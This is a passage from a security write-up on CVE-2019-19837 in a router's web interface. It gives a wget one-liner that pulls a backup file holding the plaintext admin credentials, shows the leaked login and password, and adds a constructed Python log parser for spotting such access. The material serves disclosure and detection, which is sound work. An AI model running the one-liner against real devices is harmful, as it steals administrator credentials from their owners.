The above shows a symbolic link from
The rpmd executable writes a backup file named /var/run/rpmkey with a new revision number. /var/run is also symbolically linked to /tmp/, so one can fetch this file as well.
rpmkey contained the admin credentials in plaintext in the following fields:
This file is fetchable due to CVE-2019-19837.
Admin credentials leakage one-liner:
➜ demo num=$(wget -q -O - 192.168.0.1/user/wps_tool_cache/var/run/rpmkey.rev);\
wget -q -O - 192.168.0.1/user/wps_tool_cache/var/run/rpmkey$num|\
strings|grep -A 1 all_powerful_login
all_powerful_login_name
admin
all_powerful_login_password
mooncake
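For detection, the two requests in the one-liner leave a recognisable trace in HTTP logs. The following is an added example, not part of the original write-up: it assumes common-log-format lines from a proxy or sensor in front of the device's web interface, and the sample lines, client addresses and function name are constructed; only the two URL paths come from the one-liner above.

```python
import posixpath
import re
from urllib.parse import unquote

# Constructed sample: common-log-format lines as a proxy or network sensor in
# front of the web interface might record them (assumed format, made-up clients).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2020:10:00:00 +0000] "GET /user/wps_tool_cache/var/run/rpmkey.rev HTTP/1.1" 200 2
10.0.0.5 - - [01/Jan/2020:10:00:01 +0000] "GET /user/wps_tool_cache/var/run/rpmkey7 HTTP/1.1" 200 40960
10.0.0.9 - - [01/Jan/2020:10:05:00 +0000] "GET /user/wps_tool_cache/placeholder.txt HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2020:10:06:00 +0000] "GET /user/wps_tool_cache/var/run/rpmkey.rev HTTP/1.1" 404 0
10.0.0.8 - - [01/Jan/2020:10:07:00 +0000] "GET /user/wps_tool_cache/%76ar/run/rpmkey3 HTTP/1.1" 200 40960
"""

# client, method, request target, status
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# The revision counter and the revisioned backup file, as named on this page.
REV = re.compile(r"^/user/wps_tool_cache/var/run/rpmkey\.rev$")
KEY = re.compile(r"^/user/wps_tool_cache/var/run/rpmkey\d+$")


def find_rpmkey_access(log_text):
    """Return {client: verdict}: 'leaked' if a key backup was served, else 'probed'."""
    verdicts = {}
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue  # not a request line in the assumed format
        client, _method, target, status = m.groups()
        # Drop the query string, decode %xx escapes and collapse ./ and //
        # so simple encoding tricks do not slip past the match.
        path = posixpath.normpath(unquote(target.split("?", 1)[0]))
        if KEY.match(path) and status == "200":
            verdicts[client] = "leaked"  # credentials file was returned
        elif KEY.match(path) or REV.match(path):
            verdicts.setdefault(client, "probed")  # attempt only, keep 'leaked' if set
    return verdicts


if __name__ == "__main__":
    for client, verdict in find_rpmkey_access(SAMPLE_LOG).items():
        print(client, verdict)
```

Any client reported as leaked should be treated as having obtained the admin credentials, so the password needs to be rotated after the device is patched.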